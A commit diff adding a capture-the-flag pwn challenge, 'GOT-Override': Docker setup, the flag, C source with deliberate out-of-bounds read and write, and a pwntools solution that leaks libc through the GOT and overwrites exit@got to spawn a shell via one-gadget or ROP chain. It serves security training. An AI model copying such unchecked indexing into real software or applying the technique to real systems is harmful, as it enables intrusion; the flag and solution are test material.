pwn(got-override): fix - re-upload challenge

pwn/GOT-Override/challenge.yml

@@ -25,4 +25,4 @@ files:
   - "public/got-override.tar.gz"
 
 state: visible
-version: "0.1"
+version: "0.1"

pwn/GOT-Override/docker-compose.yml

@@ -0,0 +1,13 @@
+version: "3.7"
+
+services:
+  challenge:
+    image: ghcr.io/cybermouflons/ccsc2024/got-override:latest
+    restart: always
+    ports:
+      - 1337:1337
+    build:
+      context: ./setup
+      dockerfile: Dockerfile
+      labels: 
+        ctf.challenge.name: GOT Override

pwn/GOT-Override/setup/Dockerfile

@@ -0,0 +1,19 @@
+
+FROM ubuntu
+
+RUN apt-get update && apt-get upgrade -y
+RUN apt-get install -y socat gcc-multilib
+
+# set workdir and transfer binary
+WORKDIR /root
+COPY got-override .
+COPY ld-linux-x86-64.so.2 .
+COPY flag.txt .
+COPY libc.so.6 .
+
+RUN chmod 755 got-override
+RUN chmod 755 ld-linux-x86-64.so.2
+RUN chmod 755 libc.so.6
+
+EXPOSE 1337
+CMD ["socat", "-v","TCP-LISTEN:1337,reuseaddr,fork,su=root", "EXEC:'/root/got-override'"]

pwn/GOT-Override/setup/flag.txt

@@ -0,0 +1 @@
+CCSC{if_Th1s_is_Your_First_Pwn_Feel_Pr0ud_otherwise_K33p_going}

pwn/GOT-Override/setup/got-override.c

@@ -0,0 +1,61 @@
+// gcc -o got-me got-me.c -Wl,--rpath=./ -Wl,--dynamic-link=./ld-linux-x86-64.so.2 -no-pie -g
+
+#include <stdio.h>
+#include <string.h>
+#include <stdlib.h>
+#include <unistd.h>
+
+// Global array for data
+char data[1024];
+
+void setup(){ 
+    setvbuf(stdout, NULL, _IONBF, 0);
+    setvbuf(stdin, NULL, _IONBF, 0);
+}
+
+int main() {
+    setup();
+    char input[64];
+    int index, read_index;
+
+    while (1) {
+        printf("\nGET ME\n\n1. Write data at index\n2. Read data at index\n3. Exit\nChoose an option: ");
+        int option;
+        scanf("%d", &option);
+
+        switch (option) {
+            case 1:
+                printf("Enter 32 bytes of data: ");
+                read(0, input, 32);
+
+                printf("Enter the index to write the data to: ");
+                scanf("%d", &index);
+
+                // No bounds checking here, potential for out-of-bounds write
+                for (int i = 0; i < 32; i++) {
+                    data[index + i] = input[i];
+                }
+
+                printf("Data written successfully.\n");
+                break;
+
+            case 2:
+                printf("Enter the index to read the data from: ");
+                scanf("%d", &read_index);
+
+                // No bounds checking here, potential for out-of-bounds read
+                printf("32-bytes of Data at index %d\n", read_index);
+                write(1, &data[read_index], 32);
+                break;
+
+            case 3:
+                printf("Exiting...\n");
+                exit(0);
+                return 0;
+
+            default:
+                printf("Invalid option!\n");
+                break;
+        }
+    }
+}

pwn/GOT-Override/sol/x.py

@@ -0,0 +1,102 @@
+#!/usr/bin/python
+from pwn import *
+import os
+
+os.chdir('../public')
+
+elf = context.binary = ELF("got-override", checksec=False)
+libc = elf.libc
+context.terminal = ['kitty', '@', 'launch', '--cwd', 'current', '--location', 'hsplit', '--title', 'DEBUG']
+gs = '''
+init-pwndbg
+b *0x401360
+c
+'''
+
+# wrapper functrns
+def sl(x): r.sendline(x)
+def sla(x, y): r.sendlineafter(x, y)
+def se(x): r.send(x)
+def sa(x, y): r.sendafter(x, y)
+def ru(x): return r.recvuntil(x)
+def rl(): return r.recvline()
+def cl(): return r.clean()
+def uu64(x): return u64(x.ljust(8, b'\x00'))
+def uuu(x): return unhex(x[2:])
+
+# Safelinking functions [https://github.com/mdulin2/mangle/]
+def protect_ptr(target, addr):
+	return (addr >> 12) ^ target
+
+def reveal_ptr(mangled_ptr, addr):
+	return protect_ptr(mangled_ptr, addr)
+
+def one_gadget(filename, base_addr=0):
+  return [(int(i)+base_addr) for i in subprocess.check_output(['one_gadget', '--raw', filename]).decode().split(' ')]
+
+def logbase(): log.info(f'Libc base: {libc.address:#x}')
+
+def log_addr(name, address):
+    log.info('{}: {:#x}'.format(name, (address)))
+
+def run():
+    if args.GDB:
+        return gdb.debug(elf.path, gdbscript=gs)
+    elif args.R:
+        HOST = args.R.split(':')[0]
+        PORT = args.R.split(':')[1]
+        return remote(HOST, PORT)
+    else:
+        return process(elf.path)
+
+r= run()
+
+# =-=- leak Libc ---
+
+# Calculate distance of write.got from data[] and read from there
+write_idx = elf.got.write - elf.sym.data
+sla(b'option: ', b'2')
+sla(b'from: ', str(write_idx).encode()) # leak write@got
+
+# get leak
+rl()
+libc.address = u64(r.recv(8)) - libc.sym.write
+logbase()
+
+# Calculate distance of exit@got from data[] and write there
+exit_idx = elf.got.exit - elf.sym.data
+
+# Overwrite GOT with one-gadget
+if args.ONEGADGET:    
+    log.info('Exploiting with One Gadget')
+    og = one_gadget(elf.libc.path, libc.address)
+
+    sla(b'option: ', b'1')
+    sla(b'data: ', p64(og[2]))
+    sla(b'data to: ', str(exit_idx).encode())  # overwrite exit@got
+
+    sla(b'option: ', b'3')  # exit and hijack control flow
+else:
+    log.info('Exploiting with ROP chain and stack pivot')
+    # Put rop chain in data[]
+    rop = ROP(libc)
+    rop.raw(rop.ret.address)
+    rop.execl(next(libc.search(b'/bin/sh\x00')))  # fuck system
+    sla(b'option: ', b'1')
+    sla(b'data: ', rop.chain())
+    sla(b'data to: ', b'0')
+
+    # overwrite exit@got with stack pivot gadget
+    # and pivot stack to data where rop chain is
+    rop = ROP(libc)
+    rop.raw(libc.address + 0x3c2c2)
+    rop.raw(0xdeadbeef)
+    rop.rsp = elf.sym.data
+    sla(b'option: ', b'1')
+    sla(b'data: ', rop.chain())
+    sla(b'data to: ', str(exit_idx).encode())  
+
+    sla(b'option: ', b'3')  # exit and hijack control flow
+
+# ====================================
+r.interactive()